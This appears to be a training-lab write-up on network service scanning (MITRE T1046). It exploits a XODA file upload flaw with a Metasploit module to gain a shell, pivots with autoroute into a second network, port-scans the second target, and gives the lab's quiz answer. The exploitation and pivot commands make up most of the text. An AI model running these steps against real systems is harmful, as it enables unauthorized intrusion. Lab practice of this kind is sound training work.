T1046 : Network Service Scanning

Lab Environment

In this lab, we are given access to a Kali machine. There are two target machines, one on the same network i.e. demo1.ine.local. This target machine is vulnerable and can be exploited using the following information. Use this information to retrieve services running on the second target machine and complete the mission!

Vulnerability Information

Vulnerability: XODA File Upload Vulnerability

Metasploit module: exploit/unix/webapp/xoda_file_upload

Objective: - Identify the ports open on the second target machine using appropriate Metasploit modules. - Write a bash script to scan the ports of the second target machine. - Upload the nmap static binary to the target machine and identify the services running on the second target machine.

Tools

The best tools for this lab are:

• Metasploit

• Bash

• Terminal

• Nmap

Writeup

ping -c 1 demo1.ine.local

nmap -p- -sSVC --min-rate 7000 -n -Pn demo1.ine.local -vvv -oN escaneo.txt

msfconsole

search xoda

use 0

show options

set rhosts demo1.ine.local

set lhost 192.167.32.2

set targeturi /

run

shell

run autoroute -s 192.82.109.2

background

use auxiliary/scanner/portscan/tcp

set RHOSTS 192.82.109.3

set verbose false

set ports 1-1000

run

Questions:

How many services are running on the second target machine? --> 3